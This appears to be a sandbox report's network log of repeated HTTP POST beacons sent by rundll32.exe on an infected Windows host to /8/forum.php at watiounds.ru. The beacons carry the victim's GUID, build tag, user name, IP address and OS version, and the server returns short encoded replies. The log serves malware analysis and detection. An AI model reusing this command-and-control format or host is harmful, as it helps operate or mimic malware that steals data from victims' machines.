                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          171192.168.2.224933695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:42.295799971 CEST226OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:42.420178890 CEST227INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:42 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 47 54 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYGTBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          172192.168.2.224933795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:42.747580051 CEST228OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:42.870292902 CEST228INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:42 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 42 59 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMBYNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          173192.168.2.224933895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:43.176161051 CEST229OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:43.301805019 CEST229INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:43 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 59 42 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCYBXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          174192.168.2.224933995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:43.635279894 CEST230OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:43.775443077 CEST230INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:43 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZMNAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          175192.168.2.224934095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:44.096007109 CEST231OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:44.223536015 CEST231INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:44 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 54 47 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMTGNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          176192.168.2.224934195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:44.540931940 CEST232OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:44.663372993 CEST232INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:44 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 41 5a 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBAZYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          177192.168.2.224934295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:44.979255915 CEST233OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:45.102582932 CEST233INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:45 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 5a 41 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAZAZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          178192.168.2.224934395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:45.415364027 CEST234OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:45.536503077 CEST235INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:45 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 4a 51 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMJQNARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          179192.168.2.224934495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:45.848030090 CEST235OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:45.972980022 CEST236INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:45 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 48 53 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKHSPARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          18192.168.2.224918395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:20:48.141587973 CEST50OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:20:48.266045094 CEST51INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:20:48 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 41 5a 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNAZMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          180192.168.2.224934595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:46.299103022 CEST236OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:46.428222895 CEST237INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:46 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZBYAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          181192.168.2.224934695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:46.735956907 CEST237OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:46.862986088 CEST238INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:46 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQZAJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          182192.168.2.224934795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:47.178822041 CEST239OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:47.304533958 CEST239INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGMNTARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          183192.168.2.224934895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:47.634949923 CEST240OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:47.763469934 CEST240INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 51 4a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCQJXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          184192.168.2.224934995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:48.085555077 CEST241OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:48.207855940 CEST241INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:48 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 4b 50 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBKPYARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          185192.168.2.224935095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:48.533744097 CEST242OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:48.656527996 CEST242INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:48 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZYBAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          186192.168.2.224935195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:48.975303888 CEST243OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:49.108551025 CEST244INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4b 50 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYKPBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          187192.168.2.224935295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:49.431199074 CEST244OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
